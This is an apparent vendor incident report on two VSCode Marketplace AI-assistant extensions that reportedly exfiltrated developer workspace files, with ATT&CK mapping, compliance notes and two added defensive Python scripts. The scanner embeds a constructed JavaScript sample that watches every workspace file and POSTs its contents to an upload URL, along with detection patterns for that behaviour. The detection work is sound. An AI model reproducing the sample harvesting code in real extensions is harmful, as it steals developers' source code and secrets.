Executive Summary
In January 2026, researchers at Koi Security reported that two AI-powered Visual Studio Code (VSCode) Marketplace extensions, ChatGPT – 中文版 (ChatGPT Chinese Edition) and ChatMoss (CodeMoss), were quietly exfiltrating developer files and other sensitive data to China-based servers. Together the two extensions had been installed roughly 1.5 million times. They collected data through real-time file monitoring, bulk harvesting of workspace files, and covert user profiling via embedded commercial analytics SDKs. Because whole workspace files were transmitted, the uploads carried not only source code but, wherever they were present in the workspace, API keys, configuration and credential files, all without user consent: a supply-chain compromise that reaches directly into the software development environment.
This incident highlights the persistent risks developers face from supply chain attacks through third-party plugins. As AI-driven code assistants surge in popularity, attackers are increasingly exploiting trusted extension marketplaces to deploy sophisticated data-stealing campaigns, raising urgent concerns for software security, compliance, and marketplace governance.
Why This Matters Now
With AI-powered developer tools seeing rapid adoption, malicious actors are targeting widely used marketplaces to propagate sophisticated spyware at scale. This breach underscores the urgent need for enhanced vetting, monitoring, and security controls in extension ecosystems to prevent source code exfiltration and supply chain compromise.
Attack Path Analysis
Attackers published malicious AI coding assistant extensions to the VSCode Marketplace and relied on developers to install them (Initial Compromise). Once installed, the extensions ran inside the user's VSCode extension host, which gives every extension the same file and network access as the signed-in user; no privilege escalation was needed and none is reported, but the code could read anything the developer could (Privilege Escalation). No explicit lateral movement occurred, although harvested credentials and configuration files could give the attackers reach into other systems the developer environment connects to (Lateral Movement). The extensions kept outbound connections open to attacker-controlled servers for tracking and instructions (Command & Control), and workspace files and code were exfiltrated to those servers via covert web requests (Exfiltration). The resulting impact was exposure of sensitive data and intellectual property, with potential follow-on compromise from any leaked credentials (Impact).
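A host-side triage script for the behaviour described above, added here as an example and not code from Koi Security, the page's sources, or any vendor. It reads each extension's package.json under the VSCode extensions directory, flags the two display names named in this incident, and applies a static heuristic to the bundled JavaScript: file watching or reading combined with an outbound HTTP call is the API pair that workspace harvesting needs. The publisher.name identifiers are not given on this page, so name matching is by display name only; the API-pair heuristic, the regular expressions, and the constructed sample manifest and JavaScript are assumptions made for the example, not signatures from the report.

```python
"""Triage installed VSCode extensions (added example, not from the incident report)."""
import json
import os
import re
from pathlib import Path

# Display names from the incident report; "CodeMoss" is the alias the report gives for ChatMoss.
KNOWN_BAD_NAMES = {"ChatGPT – 中文版", "ChatMoss", "CodeMoss"}

# Extension-API and Node calls that watch or read workspace files ... (assumed indicator set)
FILE_ACCESS = re.compile(
    r"createFileSystemWatcher|onDidChangeTextDocument|onDidSaveTextDocument|"
    r"workspace\.findFiles|readFileSync\(|readFile\(|promises\.readFile")
# ... and calls that move data off the host (assumed indicator set).
NETWORK_SEND = re.compile(
    r"https?\.request\(|fetch\(|axios\.(?:post|put|request)\(|XMLHttpRequest|new WebSocket\(")


def normalize(name: str) -> str:
    """Case-fold and drop spaces and dashes so 'ChatGPT - 中文版' and 'ChatGPT – 中文版' compare equal."""
    return re.sub(r"[\s\-\u2013\u2014_]+", "", name).lower()


_BAD = {normalize(n) for n in KNOWN_BAD_NAMES}


def inspect_extension(manifest: dict, bundled_js: str) -> dict:
    """Triage one extension from its parsed package.json and its concatenated JS source."""
    display = manifest.get("displayName") or manifest.get("name", "")
    f = {
        "id": f"{manifest.get('publisher', '?')}.{manifest.get('name', '?')}",
        "displayName": display,
        "known_bad_name": normalize(display) in _BAD,
        # "*" makes the extension activate on every VSCode start, before any user action
        "activates_on_startup": "*" in manifest.get("activationEvents", []),
        "reads_or_watches_files": bool(FILE_ACCESS.search(bundled_js)),
        "sends_network": bool(NETWORK_SEND.search(bundled_js)),
    }
    f["harvest_pattern"] = f["reads_or_watches_files"] and f["sends_network"]
    f["suspicious"] = f["known_bad_name"] or f["harvest_pattern"]
    return f


def scan_extensions_dir(root: Path, max_js_bytes: int = 4_000_000) -> list:
    """Walk <root>/<publisher>.<name>-<version>/ and triage every extension found."""
    results = []
    for ext_dir in sorted(p for p in root.iterdir() if p.is_dir()):
        manifest_path = ext_dir / "package.json"
        if not manifest_path.is_file():
            continue
        manifest = json.loads(manifest_path.read_text(encoding="utf-8-sig", errors="replace"))
        chunks, total = [], 0
        for js in ext_dir.rglob("*.js"):  # bundled code plus any shipped node_modules
            if total >= max_js_bytes:
                break
            text = js.read_text(encoding="utf-8", errors="replace")
            chunks.append(text)
            total += len(text)
        results.append(inspect_extension(manifest, "".join(chunks)))
    return results


# Constructed sample (not a real extension) showing the watch-then-upload pattern the report describes.
SAMPLE_MANIFEST = {"publisher": "example", "name": "ai-helper", "displayName": "AI Helper",
                   "activationEvents": ["*"]}
SAMPLE_JS = """
const w = vscode.workspace.createFileSystemWatcher('**/*');
w.onDidChange(u => fs.promises.readFile(u.fsPath).then(b => fetch(UPLOAD_URL, {method: 'POST', body: b})));
"""

if __name__ == "__main__":
    # VSCode keeps user extensions under ~/.vscode/extensions on every platform.
    root = Path(os.path.expanduser("~")) / ".vscode" / "extensions"
    findings = scan_extensions_dir(root) if root.is_dir() else [inspect_extension(SAMPLE_MANIFEST, SAMPLE_JS)]
    for f in findings:
        if f["suspicious"]:
            print(f"REVIEW {f['id']} ({f['displayName']}): {f}")
```

The heuristic will also flag legitimate extensions that sync files to a backend (cloud snippet managers, remote-development helpers), so treat a hit as a prompt to read the extension's network code and publisher history, not as a verdict. For an organisation-wide sweep, the same inspect_extension function can be fed the output of code --list-extensions collected by endpoint management.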
Kill Chain Progression
Initial Compromise
Description
Users installed trojanized AI coding assistant extensions from the VSCode Marketplace. Extensions run inside VSCode's extension host with the full rights of the signed-in user, and there is no permission model limiting an extension's file or network access, so the malicious code ran with developer privileges from the moment it activated.
Related CVEs
None applicable. The data collection was behaviour of the extensions themselves rather than a defect in Visual Studio Code, so no VSCode version range is affected and no CVE identifier describes this incident. The identifiers that matter for response are the extension IDs and versions given in the Koi Security report and the Marketplace listings.
Status:
Live on the VSCode Marketplace with roughly 1.5 million combined installs at the time of discovery.
MITRE ATT&CK® Techniques
Techniques mapped are suitable for generalized ATT&CK-based filtering and may be further refined with full threat intelligence enrichment.
Supply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)
Software Extensions: IDE Extensions (T1176.002)
User Execution: Malicious File (T1204.002)
File and Directory Discovery (T1083)
Unsecured Credentials: Credentials In Files (T1552.001)
Automated Collection (T1119)
Data from Local System (T1005)
Application Layer Protocol: Web Protocols (T1071.001)
Exfiltration Over C2 Channel (T1041)
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Risk Assessments for Security Control Failures
Control ID: 12.3.1
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Supply Chain Risk
Control ID: Article 28
CISA Zero Trust Maturity Model 2.0 – Monitor and Secure Software Dependencies
Control ID: Supply Chain Controls
NIS2 Directive – Supply Chain Security, including relationships with direct suppliers and service providers
Control ID: Article 21(2)(d)
Sector Implications
Industry-specific impact of the incident, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
Direct impact from malicious VSCode extensions stealing source code, credentials, and API keys across roughly 1.5 million installs through supply-chain compromise of a trusted developer tool.
Information Technology/IT
Critical exposure as IT teams using VSCode face data exfiltration of infrastructure configurations, cloud credentials, and development environment secrets.
Financial Services
High risk from stolen financial application code, API keys, and compliance-sensitive data via compromised development tools; developer tooling must be treated as in scope for the firm's supply-chain and third-party risk controls.
Health Care / Life Sciences
Severe HIPAA exposure is possible where exfiltrated workspaces contained healthcare application code, patient data processing logic, or credentials for medical systems that hold protected health information.
Sources
- Malicious AI extensions on VSCode Marketplace steal developer data. https://www.bleepingcomputer.com/news/security/malicious-ai-extensions-on-vscode-marketplace-steal-developer-data/
- Fake ChatGPTs harvest data from 1.5M developers. https://cybernews.com/security/fake-chatgpt-vscode-extensions-compromised-developers/
- Malicious VSCode Marketplace extensions hid trojan in fake PNG file. https://www.bleepingcomputer.com/news/security/malicious-vscode-marketplace-extensions-hid-trojan-in-fake-png-file/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Zero Trust network segmentation, egress policy enforcement, cloud-native inline inspection, and microsegmentation could have limited the ability of the malicious extensions to exfiltrate data and communicate with attacker infrastructure, significantly reducing both exfiltration and C2 opportunities while preventing the spread of compromise within a developer environment.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: Inline enforcement of extension and application behaviors could block or alert on risky plugin code.
Control: Zero Trust Segmentation
Mitigation: Least privilege and identity-based segmentation could block extensions from accessing unnecessary files and secrets.
Control: East-West Traffic Security
Mitigation: Service-to-service traffic controls would prevent malicious extension-driven pivots.
Control: Multicloud Visibility & Control
Mitigation: Centralized monitoring identifies and alerts on anomalous or unauthorized outbound connections.
Control: Egress Security & Policy Enforcement
Mitigation: Egress filtering and data loss prevention block unauthorized file transfers; an enforced firewall policy reduces both the likelihood and the scope of data loss.
Impact at a Glance
Affected Business Functions
- Software Development
- Intellectual Property Management
Estimated downtime: 7 days
Estimated loss: $500,000
Unauthorized access to proprietary source code, configuration files, and sensitive credentials, potentially leading to intellectual property theft and compromise of internal systems.
Recommended Actions
Key Takeaways & Next Steps
- Enforce Zero Trust segmentation and least-privilege policies for developer workspaces to minimize extension access to sensitive files.
- Implement strict egress filtering and application-aware outbound controls to prevent unauthorized extensions from transmitting data externally.
- Deploy cloud-native real-time inspection and behavioral analytics to detect malicious extension or shadow AI activities.
- Mandate visibility into east-west traffic and developer environment communications to identify and contain supply chain attacks early.
- Regularly audit and monitor marketplace-sourced plugins/extensions and integrate CNSF controls for continuous compliance and risk mitigation.
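An egress detection rule of the kind the recommendations above call for, added here as an example and not code from the page's sources or any vendor product. It applies an allowlist plus an upload-volume threshold to process-attributed outbound connection records, the kind an EDR or process-aware proxy emits. The record layout, process names, allowlist and threshold are assumptions made for the example, and the destination hostnames in the sample records are constructed under the reserved example.net domain, not the servers from the incident. What it shows is that a policy of "the VSCode extension host may only talk to known marketplace and update hosts" turns a file-harvesting extension's uploads into alerts instead of silent data loss.

```python
"""Egress policy check for developer workstations (added example, not from the page's sources)."""
import re
from collections import defaultdict

# How the (assumed) endpoint agent names VSCode's extension host on macOS, Linux and Windows.
EXTENSION_HOST_PROCS = {"Code Helper (Plugin)", "code", "Code.exe"}

# Example allowlist: hosts a stock VSCode install legitimately contacts for marketplace/update traffic.
EGRESS_ALLOWLIST = {
    "marketplace.visualstudio.com",
    "update.code.visualstudio.com",
    "vscode.blob.core.windows.net",
    "api.github.com",
}
UPLOAD_THRESHOLD_BYTES = 1_000_000  # cumulative bytes out to one destination before a bulk-upload alert

# Assumed record layout: <ts> <endpoint> proc="<process>" dst=<host>:<port> out=<bytes sent>
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<endpoint>\S+) proc="(?P<proc>[^"]+)" dst=(?P<dst>[^:\s]+):(?P<port>\d+) out=(?P<out>\d+)$'
)


def parse_record(line: str):
    """Parse one connection record; returns None for lines that do not match the layout."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    rec["out"] = int(rec["out"])
    return rec


def is_allowed(dst: str) -> bool:
    """Exact match or subdomain of an allowlisted host."""
    return dst in EGRESS_ALLOWLIST or any(dst.endswith("." + a) for a in EGRESS_ALLOWLIST)


def detect_egress(lines):
    """Return alerts for extension-host traffic to non-allowlisted destinations.

    One 'egress-policy' alert per offending connection, plus one 'bulk-upload' alert
    per (endpoint, destination) whose cumulative bytes out cross UPLOAD_THRESHOLD_BYTES.
    """
    alerts = []
    uploaded = defaultdict(int)
    crossed = set()
    for line in lines:
        rec = parse_record(line)
        if rec is None or rec["proc"] not in EXTENSION_HOST_PROCS or is_allowed(rec["dst"]):
            continue
        alerts.append({"rule": "egress-policy", "ts": rec["ts"], "endpoint": rec["endpoint"],
                       "proc": rec["proc"], "dst": rec["dst"], "out": rec["out"]})
        key = (rec["endpoint"], rec["dst"])
        uploaded[key] += rec["out"]
        if uploaded[key] >= UPLOAD_THRESHOLD_BYTES and key not in crossed:
            crossed.add(key)
            alerts.append({"rule": "bulk-upload", "ts": rec["ts"], "endpoint": rec["endpoint"],
                           "proc": rec["proc"], "dst": rec["dst"], "out": uploaded[key]})
    return alerts


# Constructed sample records (hostnames under the reserved example.net domain, not real infrastructure).
SAMPLE_RECORDS = [
    '2026-01-14T09:12:01Z dev-mbp-07 proc="Code Helper (Plugin)" dst=marketplace.visualstudio.com:443 out=2411',
    '2026-01-14T09:12:05Z dev-mbp-07 proc="Code Helper (Plugin)" dst=telemetry.example.net:443 out=4096',
    '2026-01-14T09:12:09Z dev-mbp-07 proc="Code Helper (Plugin)" dst=upload.example.net:443 out=734003',
    '2026-01-14T09:12:31Z dev-mbp-07 proc="Code Helper (Plugin)" dst=upload.example.net:443 out=612880',
    '2026-01-14T09:13:00Z dev-mbp-07 proc="Slack Helper" dst=slack.com:443 out=9800',
    '2026-01-14T09:13:02Z dev-mbp-07 proc="Code Helper (Plugin)" dst=api.github.com:443 out=1200',
]

if __name__ == "__main__":
    for a in detect_egress(SAMPLE_RECORDS):
        print(f"{a['rule']:<13} {a['ts']} {a['endpoint']} {a['proc']} -> {a['dst']} ({a['out']} bytes)")
```

The allowlist is deliberately short: the extension host needs almost no outbound access of its own, and any legitimate extension that does (a hosted AI assistant, for instance) should be added explicitly, per destination, so that a new upload host appearing for the first time is always an alert. The same two rules translate directly into an egress firewall or proxy policy keyed on process identity where the platform supports it.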

